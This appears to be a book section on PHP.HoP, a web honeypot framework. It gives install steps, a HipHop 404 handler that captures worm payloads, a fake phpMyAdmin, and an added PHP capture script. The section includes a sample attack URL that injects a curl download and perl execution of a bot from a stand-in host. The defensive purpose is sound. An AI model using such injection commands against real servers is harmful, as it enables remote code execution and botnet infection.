
3.6. PHP.HoP — A Web-Based Deception Framework

The purpose of PHP.HoP is similar to that of the GHH: it provides a mechanism to identify and observe threats on the Web. According to one of the authors, Laurent Oudot, PHP.HoP can help to identify a wide range of security threats, from automatic tools for finding security holes to web-based worms [68]. A web-based worm is a piece of software that exploits vulnerabilities in web servers to gain control over the host running the web server and then goes on to infect other vulnerable web servers.

To deceive human attackers as well as worms and other automated activity, PHP.HoP emulates a number of well-known web application vulnerabilities. One famous example is the phpBB bulletin board software, which has been plagued with vulnerabilities that allow an adversary to execute arbitrary code on the underlying web server. See Section 10.2 for a case study of search worms in which techniques similar to PHP.HoP are used to capture worm binaries.

3.6.1. Installation

To install PHP.HoP, you need to run an Apache web server with PHP support. Your PHP installation should be at least at version 4.0.

1. Download the PHP.HoP software from http://www.rstack.org/phphop/download/.

2. Unzip the archive in a temporary directory that is not part of your web server's document tree: $ unzip phphop-0.5.zip

3. PHP.HoP has two major directories: a library directory that is required by all modules and a modules directory that contains the code for the different PHP honeypots.

4. Copy the lib directory to the root of your web server: $ cp -pr phphop-0.5/lib /var/httpd/htdocs. Replace /var/httpd/htdocs with the document root of your web server.

5. Choose which modules to install on your web server. At the time of this writing, PHP.HoP supports six different modules:

  • autobuild-fake-apache-dir: Pretends to be an empty directory

  • hiphop: A generic 404 handler for catching web-based worms

  • phpmyadmin: A fake phpMyAdmin frontend

  • phpshell-by-macker: Simulates the phpshell by macker backdoor

  • webmail: Pretends to be an open web-based mail frontend

6. Configure the config.php file so that the module can find the support libraries. Some modules do not ship a config.php file in their directory, so you might have to copy it from another module. The configuration is very simple; you need to change the following variables:

  • Point pathlib to the directory in which the library files reside.

  • Point pathlog to the directory in which log files should be created.

  • Set mailaddr to the e-mail address at which you want to receive alerts. An empty e-mail address means that no e-mail alerts are delivered.

In the following, we discuss how to configure two different modules. The other modules follow the same pattern. Some basic knowledge of PHP will be helpful.

3.6.2. HipHop

The HipHop module is the most interesting module provided by PHP.HoP. Its main purpose is to detect new attacks against a variety of web applications. If it detects an attempt to download exploits or bots onto your machine, it captures the payload and saves it for later analysis instead of executing it.

There are several steps you must execute to install this module:

1. Copy the HipHop module to your web server:

$ cp -pr hiphop-0.5/modules/hiphop /var/httpd/htdocs/

2. Create the appropriate config.php file. In our case, we simply copy it from another module:

$ cp -p hiphop-0.5/modules/phpmyadmin/config.php /var/httpd/htdocs/hiphop

3. Unlike the other modules, HipHop requires some additional configuration in the .htaccess file. That file not only determines who can access web pages but also how error pages such as Page Not Found are presented. Add the following line to the .htaccess file at the root of the web server:

ErrorDocument 404 /hiphop/hiphop.php

If you do not have a .htaccess file yet, go ahead and create it. As a result, every URL that does not correspond to a document on your web server is redirected to the honeypot.

You should be good to go now. Try to access a page that does not exist on your web server so that the 404 handler fires. If everything worked correctly, you should see text similar to Welcome/path/you/used/to/get/404. Attackers usually encode a list of Unix commands as part of the exploit. This often entails downloading and executing perlbots or other kinds of backdoors.

When you look at the hiphop.php source code, you will find some attack examples that you can use to verify that malicious payloads are really being captured. For example, try to access the following URL on your web server:

/board/skin/zero_vote/error.php?dir=http://example.uk/kaero/fbi.gif?&
  cmd=cd%20/tmp;curl%20-O%20example.uk/kaero/botperl;perl%20botperl

When HipHop receives this URL, it recognizes the curl command that downloads a Perl bot. HipHop internally emulates the download and saves the bot in your configured download directory. In this example, HipHop will create the following files:

With a little bit of luck, your honeypot will collect many interesting payloads over time. When looking at the downloads, you might find the names of IRC servers, channels, and channel passwords. Joining these channels can be amusing but might also lead to your IP address being subjected to denial-of-service attacks, so be careful. You can find more interesting details on botnets in Chapter 11.
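The processing just described (a 404 handler that reads the injected command list, recognizes the download command, fetches the payload into a quarantine directory without executing it, and logs the visit) can be seen end to end in the following script. This is an added example written for current PHP (7 or later), not PHP.HoP's own hiphop.php. It reuses the config.php variable names the section lists (pathlib, pathlog, mailaddr); the extra variable $pathdownload, the function names, and the directory values are assumptions made for the example.

```php
<?php
// Added example, not PHP.HoP's own code: a minimal HipHop-style 404 handler.
// It uses the config.php variables the section names ($pathlib, $pathlog,
// $mailaddr) and one hypothetical extra, $pathdownload, for captured payloads.
// Apache reaches this script through "ErrorDocument 404 /hiphop/hiphop.php".

// --- config.php equivalents (constructed values; adjust to your server) ---
$pathlib      = '/var/httpd/htdocs/lib';              // support libraries
$pathlog      = '/var/httpd/htdocs/hiphop/logs';      // one log file per day
$pathdownload = '/var/httpd/htdocs/hiphop/downloads'; // hypothetical: quarantine dir
$mailaddr     = '';                                   // '' disables e-mail alerts

/**
 * Pull the URLs that an injected command list tries to fetch.
 * $cmd is the attacker's ';'-separated shell command list, e.g.
 * "cd /tmp;curl -O example.uk/kaero/botperl;perl botperl".
 * Only curl/wget arguments are reported, and nothing is ever executed.
 */
function extractDownloadUrls(string $cmd): array
{
    $urls = [];
    foreach (preg_split('/[;&|]+/', $cmd) as $command) {
        $argv = preg_split('/\s+/', trim($command), -1, PREG_SPLIT_NO_EMPTY);
        if ($argv === [] || !in_array($argv[0], ['curl', 'wget'], true)) {
            continue;
        }
        foreach (array_slice($argv, 1) as $arg) {
            if ($arg[0] === '-') {        // option such as -O or -q, not a target
                continue;
            }
            // Bare hosts like "example.uk/..." are taken as http://
            $urls[] = preg_match('#^[a-z][a-z0-9+.-]*://#i', $arg) ? $arg : 'http://' . $arg;
        }
    }
    return $urls;
}

/**
 * Fetch a payload into the quarantine directory without executing it: only
 * http(s) URLs are followed, the read is capped at $maxBytes, the file is
 * named by the SHA-1 of its contents and stored with mode 0600 (no x bit).
 */
function captureRemoteFile(string $url, string $pathdownload, int $maxBytes = 1048576): ?string
{
    if (!preg_match('#^https?://#i', $url)) {
        return null;                      // refuse file://, ftp:// and friends
    }
    $ctx = stream_context_create(['http' => ['timeout' => 10, 'follow_location' => 0]]);
    $fh  = @fopen($url, 'rb', false, $ctx);
    if ($fh === false) {
        return null;
    }
    $data = stream_get_contents($fh, $maxBytes);
    fclose($fh);
    if ($data === false || $data === '') {
        return null;
    }
    $dest = $pathdownload . '/' . sha1($data);
    file_put_contents($dest, $data, LOCK_EX);
    chmod($dest, 0600);
    return $dest;
}

/**
 * Append one line to today's log file: timestamp, remote host, user agent,
 * requested URI and a note (the per-day layout PHP.HoP's modules use).
 */
function logAccess(string $pathlog, array $server, string $note): void
{
    $line = sprintf("%s %s \"%s\" %s %s\n", date('c'),
        $server['REMOTE_ADDR'] ?? '-', $server['HTTP_USER_AGENT'] ?? '-',
        $server['REQUEST_URI'] ?? '-', $note);
    file_put_contents($pathlog . '/' . date('Y-m-d') . '.log', $line, FILE_APPEND | LOCK_EX);
}

// --- request handling ---
// Under an ErrorDocument internal redirect $_GET is not populated from the
// original request, so the query string is taken from REQUEST_URI instead.
$requestUri = $_SERVER['REQUEST_URI'] ?? '/';
parse_str((string) parse_url($requestUri, PHP_URL_QUERY), $params);

$captured = [];
if (isset($params['cmd']) && is_string($params['cmd'])) {
    foreach (extractDownloadUrls($params['cmd']) as $url) {
        $saved      = captureRemoteFile($url, $pathdownload);
        $captured[] = $url . ' => ' . ($saved ?? 'not fetched');
    }
}
logAccess($pathlog, $_SERVER, implode(' ', $captured));
if ($mailaddr !== '' && $captured !== []) {
    mail($mailaddr, 'HipHop: payload captured', implode("\n", $captured));
}

// The visible reply mirrors the original: "Welcome" plus the path requested.
http_response_code(200);
echo 'Welcome' . htmlspecialchars((string) parse_url($requestUri, PHP_URL_PATH));
```

For the sample URL from the text, parse_str() decodes the cmd parameter to "cd /tmp;curl -O example.uk/kaero/botperl;perl botperl", extractDownloadUrls() yields http://example.uk/kaero/botperl, and the fetched bytes land under $pathdownload named by their SHA-1 with the execute bit cleared. The size cap and the http-only check matter in practice: the honeypot is fetching whatever the attacker points it at, so it must not be usable to read local files or to fill the disk.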

3.6.3. PhpMyAdmin

Another PHP.HoP module leverages the fact that many web-based database frontends are not sufficiently secured and can be accessed by anyone on the Internet. In this case, PHP.HoP provides a lookalike of phpMyAdmin, a popular web-based frontend to MySQL servers. Many websites that run bulletin boards or present other databases to their users install phpMyAdmin to quickly browse or manage their databases. Although it is strongly recommended to restrict access to the frontend, some web servers leave the door wide open. The corresponding PHP.HoP module emulates an unsecured phpMyAdmin installation. Its installation is similar to that of HipHop. Once installed, anyone can visit your fake phpMyAdmin interface.

An adversary will see several databases, including databases called emails and secretfiles. Every access to the fake frontend is logged in the logs directory. Each day has its own log file, which includes the name of the remote host, the user agent, and other useful information.

Unfortunately, the fake phpMyAdmin does not simulate much functionality, so it is only going to be of limited interest to an attacker. We hope that future versions of PHP.HoP will improve on this.
